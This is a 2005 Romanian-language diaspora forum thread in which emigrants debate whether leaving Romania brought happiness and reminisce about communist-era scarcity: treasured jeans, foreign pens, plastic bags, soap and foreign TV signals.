Aconi iar iti agiti neuronul ala ratacit ?!Daca promiti ca te muti la polul N eu promit sa-ti dau un premiu de 10.000 $ (din toata saracia mea ) , asta pe langa demersurile pe care le voi face pentru a-ti acorda premiul de cel mai pedant intelectual in viata (sper?!).

aconi
28.02.2005, 03:21
Stiu oameni plecati din Romania pe care
nu-i mai multumea fostul RFG voiau in State ca e mai bine.Cautam
fericirea: DA! dar unde e? Am mai zis, este fericire si in iglu
dupacum este nefericire si in palatele imparatesti.smileys/smiley25.gifaconi

Continuand argumentul, nu e o mare diferenta intre exemplul tau si
cazul unuia care pleaca de la Apahida la Cluj, dupa care se muta la
Bacau, ca e mai bine. Tot un fel de imigrare-i si asta. Exact asa cum
la tine in tara s-ar putea sa-ti gasesti de lucru doar la Bucuresti si
sa-ti dai seama dupa o vreme ca urasti capitala si vrei sa te muti la
Timisoara, tot asa, unii dintre noi (si eu fac parte din categoria
mentionata de tine) am plecat intai in Germania, iar de acolo in
America.

De ce? In cautarea fericirii, evident, si in mare parte poate din
neadaptare la gazda noastra europeana. Cum spunea un prieten de-al meu
cu care-mi faceam veacul in Munchen pe vremuri, "ca roman in Germania
nu vietuiesti, ci supravietuiesti". Nu se poate generaliza, dar cert e
ca nu orice tara de adoptie se potriveste oricui. Drept urmare, cautam,
pana gasim, daca gasim...

Va doresc sincer, din suflet:SA GASITI.Ddar, daca nu gasiti?aconi

28.02.2005, 04:21
aconi,iti spun ce este fericirea: pe cand traiam in Ro, cu multi ani in urma, copil fiind, o ruda din Germania mia dat cadou o pereche de "blugi"...am fost asa de fericit ca am dormit in blugi noaptea!

cu o alta ocazie am primit un ceas electronic, fericire mare, purtam maneca scurta si iarna!

de un Craciun, s-au "dat" banane si portocale la alimentara; dupa numai 3 ore de stat la coada in strada am reusit sa cumpar si eu...toata familia a fost foarte fericita.

Cu o alata ocazie, un vecin vindea un casetofon Phillips,am platit salariu meu pe 2 luni si l-am cumparat,am fost foarte fericit. Cand am fost la pasapoarte si ofiterul de securitate mia strigat numele sa vin sa-mi iau pasaportul de plecare definitiva am fost asa de fericit ca imi tremurau piciorele...Sunt in America de multi ani si parca nu mai sunt asa fericit........... smileys/smiley2.gif

garfield
28.02.2005, 06:23
Tin minte si eu cand eram copil in romania si nu aveam de unde sa primesc blugi adevarati, doar puteam visa despre ei, dar mi-a adus cineva niste pixuri 'Bic', sice fericit eram http://www.romanian-portal.com/forum/smileys/smiley36.gif

Sunt in America de multi ani si parca nu mai sunt asa fericit........... http://www.romanian-portal.com/forum/smileys/smiley2.gif

Bine inteles ca acum nu mai ai asa fel fe fericiri. Acum poti sa-ti cumperi tot ce doresti oricand si oriunde.smileys/smiley2.gif

ancad
28.02.2005, 06:27
Parearea mea este ca plecand din Roamania nu cauti neparat sa fii mai fericit..ci cauti o viata mai buna, decenta. Iar aceasta viata mai buna iti aduce indirect si fericire si multumiri. In Romania nu ai cum sa fii fericit decat daca te multumesti cu putin si nu ai prea mai pretentii si dorinte in viata asta.

In Romania oricat ai munci, muncesti ca un scalv pe un salar care oricat de mare ar fi tot nu iti permiti mare lucru. Acolo ca tanar nu ai cum sa o duci prea bine si trebuie sa faci foarte multe sacrificii si sa renunti la multe. Acolo ca tanar o duci bine doar daca ai parinti cu bani care ti-au cumparat de toate ( casa, masina), dar si atunci este riscul ca sa te saturi de mizeria si bataia de joc care o poti intani in multe locuri chiar si la "minunatele firme multinationale" deschisein Roamniaca sa-i exploateze pe romania si sa le dea ceva bani mai multi, " praf in ochi".

Nu poti sa fii fericit in Roamnia cand munca ta si studiile tale valoreaza zero..cand toate nu se pot face decat cu pile, spaga..cand toata viata ta oricat te-ai zbate ramane cenusie.

28.02.2005, 06:40
Tin minte si eu cand eram copil in romania si nu aveam de unde sa primesc blugi adevarati, doar puteam visa despre ei, dar mi-a adus cineva niste pixuri 'Bic', sice fericit eram http://www.romanian-portal.com/forum/smileys/smiley36.gif

smileys/smiley36.gifeu mi-am amintit de colectia mea de pungi de plastic colorate de firma ,care le primeam cind venea cineva din afara tine-au pungile alea 5-6 ani sile refoloseam mereu cu prudentaca sa tiana cit mai mult ,ce ne mai asortam cu ele dupa culori si desenesmileys/smiley9.gif

garfield
28.02.2005, 07:00
melina, tin si eu minte pungile de plastic, si ce grija aveam de ele smileys/smiley36.gifNu am apucat sa le 'primesc' niciodata dar tin minte ca le cumparam si le plimbam pe strada, ca si cand vai cine as fi fost eu, cel cu punga cu Marlboro smileys/smiley36.gif

28.02.2005, 07:07
smileys/smiley36.gifnoi le primeam pe vremea lui ceasca ca nu erau in tara ,mai tii minte alea cu BILLA pe fond galben si cu scris rosu?!smileys/smiley36.gif,acum sint pe toate drumurilesmileys/smiley2.gif

Johann
28.02.2005, 07:13
..dar nu nimeni nu vorbeste da sapunuri (Fa)tinute intre haine in sifonier ''sa miroase frumos''..smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

28.02.2005, 07:29
melina, tin si eu minte pungile de plastic, si ce grija aveam de ele smileys/smiley36.gifNu am apucat sa le 'primesc' niciodata dar tin minte ca le cumparam si le plimbam pe strada, ca si cand vai cine as fi fost eu, cel cu puga cu Marlboro smileys/smiley36.gif

Haha, dar de badoagele de coca cola, pepsi si bere Loewenbrau culese de prin gunoaiele de la caminele de studenti staraini, duse acasa, spalate si puse la colectie ati auzit?

angela
28.02.2005, 07:42
smileys/smiley36.gifsmileys/smiley36.gifSapunurile " Fa" chiar am uitat de elesmileys/smiley36.gif, mersi Johann ca mi-ai adus amintesmileys/smiley2.gif

TIn minte ca am primit odata de ziua mea o caseta audio si cred ca am
inregistrat pe ea de 10 mii de ori. Chiar pana in ziua de azi pastrez
acea caseta ca pe o amintiresmileys/smiley2.gif

Johann
28.02.2005, 07:49
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif..de casete nu mai zic...casete cu ''glume'' ascultate de 10 ori pe zi aceleasi ''glume''..smileys/smiley36.gifsmileys/smiley36.gif...ori discuri cu muzica ''straina'' de la bulgari...smileys/smiley36.gif

tonita
28.02.2005, 07:57
He,he. V

28.02.2005, 08:00
Antena cu care prinde-ai Bulgarii si puteai sa vezi un studio X smileys/smiley36.gif

28.02.2005, 08:54
Antena cu care prinde-ai Bulgarii si puteai sa vezi un studio X smileys/smiley36.gif

Dreaku! La noi in Cluj nu prindeai decat ungurii, si aia cu greu, daca te suiaipe dealul Feleacului...

garfield
28.02.2005, 10:00
pe unde in Cluj ai stat fritz? Eu am locuit pe strada Paris, direct peste drum de spitalul Stanca.

sauzimdebine
28.02.2005, 10:33
Ca tot veni vorba de sapunuri, am o matusa care pastreaza si astazi unul in sifonier, a ajuns la venerabila varsta de 25 de ani, sapunul nu matusa. Asta doar in amintirea glorioaselor vremuri cand tot ce era strain era si bun.
Pungile de plastic erau ghiozdan la vremea liceului. Purtam doar un caiet, maxim doua, din acelea mari, numite studentesti. Pungile, inclusiv acelea pentru tigari, se faceau la fabrica de mase plastice din Buzau. Cine avea un cunoscut care lucra acolo avea si multi prieteni.smileys/smiley36.gif smileys/smiley36.gif
Pixul de provenienta straina era pentru orice numai pentru scris nu. Cum puteai sa-l consumi pe scris. De scris, scriam cu flaro, sau cum se mai chemau, acelea de jumatate din pasta curgea iar jumatate se usca inainte de vreme.
Cat despre piata neagra, vandut si cumparat orice, pentru ca nu se gaseau nu ca ar fi fost cine stie ce "marfa".
Exista azi in Romania cineva, persoana foarte controversata in urma unor speculatii financiare, cu care am cumparat si vandut (facut afaceri as putea spune)tigari, cafea, etc., etc., de la polonezi, sau oricine altcineva aducea marfa de "bijnita" dupa cum o denumeau tovarasii, nu cu mult inainte de marea vanzoleala din decembrie.
Doamne ce vremuri ...

28.02.2005, 10:41
pe unde in Cluj ai stat fritz? Eu am locuit pe strada Paris, direct peste drum de spitalul Stanca.

Gradini-Manastur, aproape de biserica Calvaria. Strada Paris era un fel de wild west pentru noi in copilarie...

aconi
01.03.2005, 19:18
aconi,iti spun ce este fericirea: pe cand traiam in
Ro, cu multi ani in urma, copil fiind, o ruda din Germania mia dat
cadou o pereche de "blugi"...am fost asa de fericit ca am dormit in
blugi noaptea!</font>

cu o alta ocazie am primit un ceas electronic, fericire mare, purtam maneca scurta si iarna!</font>

de un Craciun, s-au "dat" banane si portocale la
alimentara; dupa numai 3 ore de stat la coada in strada am reusit sa
cumpar si eu...toata familia a fost foarte fericita. </font>

Cu o alata ocazie, un vecin vindea un casetofon Phillips,am platit

salariu meu pe 2 luni si l-am cumparat,am fost foarte
fericit. Cand am fost la pasapoarte si ofiterul de securitate mia
strigat numele sa vin sa-mi iau pasaportul de plecare definitiva am
fost asa de fericit ca imi tremurau piciorele...Sunt in America de
multi ani si parca nu mai sunt asa fericit........... smileys/smiley2.gif</font></font>

Mugatu, Totul este relativ.Iar sufletul un cazan in care fierb aceste relativitati dn care este formata viata.

Voi cei plecati de acasa pentru a gasi o viata mai buna, un
trai decent,libertate etc.traiti mai intens aceasta fierbere si
multi nu pot scapa de gandul de acasa.de aceea si prezenta
rubrica atat de cautata.Pe masura ce inainteaza in varsta "cautarle" se
diminuiaza, amintirile de acasa si bune si rele revin in suflet si in
mintea celor dezradacinati, multi se reintorc si multi se integraza in
noua "familie".Doresc tuturor sa realizaze ceea ce si-au
propsus.aconi.(ps nu am reusit sa scriu cu edit, poate am ocupat mult
spatiu)smileys/smiley7.gif

garfield
02.03.2005, 06:06
Voi cei plecati de acasa pentru a gasi o viata mai buna, un trai decent,libertate etc.traiti mai intens aceasta fierbere si multi nu pot scapa de gandul deacasa.

Nu foarte multi nu scapa da gandul asta! Suntem destui care avem alte preocupari si alte lucruri la care sa ne gandim.

Daca tu continu-i sa-ti spui si tie si la altii cat de rau este pentru cei plecati, si cat de dor le e de romania si cum no o sa le fie niciodata bine....poate intro zi tu vei ajunge chiar sa crezi treaba asta smileys/smiley5.gif

02.03.2005, 06:48
aconi, tu tot pe a ta o tii indiferent ce citest sau auzi, asa ca nu mai are rost sa incerc sa te conving de ceva. Daca tu vrei sa crezi ca noi cei din diaspora suntem ca frunzele uscate batute de vant in toate directiile, ca zi si noapte visam la clipa cand ne vom "inapoia" in tara, asta este treaba ta, nu am cu ce sa te ajut. Eu doresc sa vin in Ro intr-o vizita scurta, sa vad, sa ma plimb, mananc, beau si apoi sa plec ACASA, la casa mea, la jobul meu, la prieteni si familia mea din US.

dancing_fire
02.03.2005, 07:04
Aconi, dorul e un sentiment CU CARE PUTEM TRAI, nesimtirea, spaga, foamea, mizeria... sunt adevaruri CU CARE NU MAI PUTEM TRAI. Asta e motivul pt care nu ne mai intoarcem in Romania decat in vizita.smileys/smiley2.gif

22.03.2005, 11:55
Salut Dana, si felicitari pentru curajul de a-ti dezvalui trairile sufletesti!!!

Nu esti singura care-si pune atitea intrebari..care traieste o mare , mare dezamagire. Am observat ca primul raspuns primit de la un veteran al emigratiei, a fost scrisnit printre dinti'' DE CE AI VENIT?''( de cind astepta sa puna intrebarea asta )

Ei bine..vreti un raspuns cinstit? : DE PROSTI!!

Aceeasi intrebare mi se pune si mie...si le raspund cinstit, ca sa nu mai pierdem timpul...si la fel le raspund si la cei din tara la intrebarea ...De ce ai plecat?

Dar, intotdeauna, lucrurile parca se observa mai bine de pe celalalt mal..asa ca gindindu-ma in retrospectiva, nu-mi aduc aminte sa fi vazut in Romania vre-un american sau vre-un canadian debordind de fericire, de buna-stare, optimist...asa cum propaganda puternica descrie locuitorii acestor locuri...

Am fost niste naivi, naivi, cascid gura si inghitind galustile vindute de unii si altii...si ce e mai trist,e ca a Romania e inca plina de naivi, ca sa nu zic prosti , care isi fac poze cu hamburgerul de la mcdonald in mina....

aconi
23.03.2005, 06:14

Incredibil dar adevarat.Noi de pe aici prindeam numai Budapesta
si bineinteles in l maghiara. Ce parere aveti mai ales cei ce ziceati
pe aici peuneva ca macma carne de ungursmileys/smiley2.gif